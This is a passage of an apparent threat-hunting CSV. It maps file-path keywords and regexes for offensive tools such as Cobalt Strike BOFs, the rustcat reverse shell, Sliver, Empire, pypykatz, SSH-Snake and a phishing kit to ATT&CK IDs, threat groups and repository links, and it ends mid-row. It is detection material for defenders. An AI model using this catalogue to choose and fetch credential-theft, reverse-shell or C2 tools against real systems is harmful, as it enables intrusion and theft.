"*/src/Sleeper.cpp*",".{0,1000}\/src\/Sleeper\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*/src/unixshell.rs*",".{0,1000}\/src\/unixshell\.rs.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*/src/winsos.cpp*",".{0,1000}\/src\/winsos\.cpp.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","1","N/A","10","2","103","24","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z" 
"*/srdi-shellcode.go*",".{0,1000}\/srdi\-shellcode\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/srv/kidlogger*",".{0,1000}\/srv\/kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/ssh2-enum-algos.nse*",".{0,1000}\/ssh2\-enum\-algos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/sshame*",".{0,1000}\/sshame.{0,1000}","offensive_tool_keyword","sshame","tool to brute force SSH public-key authentication","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/HynekPetrak/sshame","1","0","N/A","N/A","1","72","14","2024-03-24T11:07:35Z","2019-08-25T16:50:56Z" "*/ssh-auth-methods.nse*",".{0,1000}\/ssh\-auth\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssh-brute.nse*",".{0,1000}\/ssh\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssh-hostkey.nse*",".{0,1000}\/ssh\-hostkey\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/sshimpanzee.git*",".{0,1000}\/sshimpanzee\.git.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","1","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*/ssh-publickey-acceptance.nse*",".{0,1000}\/ssh\-publickey\-acceptance\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssh-run.nse*",".{0,1000}\/ssh\-run\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/SSH-Snake.git*",".{0,1000}\/SSH\-Snake\.git.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*/SSH-Snake/*",".{0,1000}\/SSH\-Snake\/.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*/sshv1.nse*",".{0,1000}\/sshv1\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssl-ccs-injection.nse*",".{0,1000}\/ssl\-ccs\-injection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssl-cert.nse*",".{0,1000}\/ssl\-cert\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssl-cert-intaddr.nse*",".{0,1000}\/ssl\-cert\-intaddr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssl-date.nse*",".{0,1000}\/ssl\-date\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssl-dh-params.nse*",".{0,1000}\/ssl\-dh\-params\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssl-enum-ciphers.nse*",".{0,1000}\/ssl\-enum\-ciphers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssl-heartbleed.nse*",".{0,1000}\/ssl\-heartbleed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssl-known-key.nse*",".{0,1000}\/ssl\-known\-key\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssl-poodle.nse*",".{0,1000}\/ssl\-poodle\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/sslv2.nse*",".{0,1000}\/sslv2\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/sslv2-drown.nse*",".{0,1000}\/sslv2\-drown\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssp/decryptor.py",".{0,1000}\/ssp\/decryptor\.py","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*/SspiUacBypass.git*",".{0,1000}\/SspiUacBypass\.git.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*/ssploit/*",".{0,1000}\/ssploit\/.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*/SSRFmap*",".{0,1000}\/SSRFmap.{0,1000}","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","1","N/A","N/A","10","2756","484","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" "*/sstp-discover.nse*",".{0,1000}\/sstp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/StackCrypt.git*",".{0,1000}\/StackCrypt\.git.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","153","25","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*/stager.ps1*",".{0,1000}\/stager\.ps1.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/stager/powershell.py*",".{0,1000}\/stager\/powershell\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/stager/powershell/payload.ps1*",".{0,1000}\/stager\/powershell\/payload\.ps1.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/stagers/*.ps1*",".{0,1000}\/stagers\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1066","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/stagers/CSharpPS*",".{0,1000}\/stagers\/CSharpPS.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - 
T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/StandIn.exe*",".{0,1000}\/StandIn\.exe.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*/StandIn.git*",".{0,1000}\/StandIn\.git.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*/StandIn_Net35.exe*",".{0,1000}\/StandIn_Net35\.exe.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*/StandIn_Net45.exe *",".{0,1000}\/StandIn_Net45\.exe\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - 
TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*/StandIn-1.3.zip*",".{0,1000}\/StandIn\-1\.3\.zip.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*/stardust.x64.exe*",".{0,1000}\/stardust\.x64\.exe.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","1","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*/Stardust/scripts/loader.x64.exe*",".{0,1000}\/Stardust\/scripts\/loader\.x64\.exe.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","1","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*/start.sh dynamic *",".{0,1000}\/start\.sh\sdynamic\s.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*/start_campaign.py*",".{0,1000}\/start_campaign\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/startProxyPool?k=*&random=n&number=2&ip=*",".{0,1000}\/startProxyPool\?k\=.{0,1000}\&random\=n\&number\=2\&ip\=.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/startProxyPool?k=*&random=y&number=2*",".{0,1000}\/startProxyPool\?k\=.{0,1000}\&random\=y\&number\=2.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/StaticSyscallsAPCSpawn/*",".{0,1000}\/StaticSyscallsAPCSpawn\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/StaticSyscallsInject/*",".{0,1000}\/StaticSyscallsInject\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/StayKit.cna*",".{0,1000}\/StayKit\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 
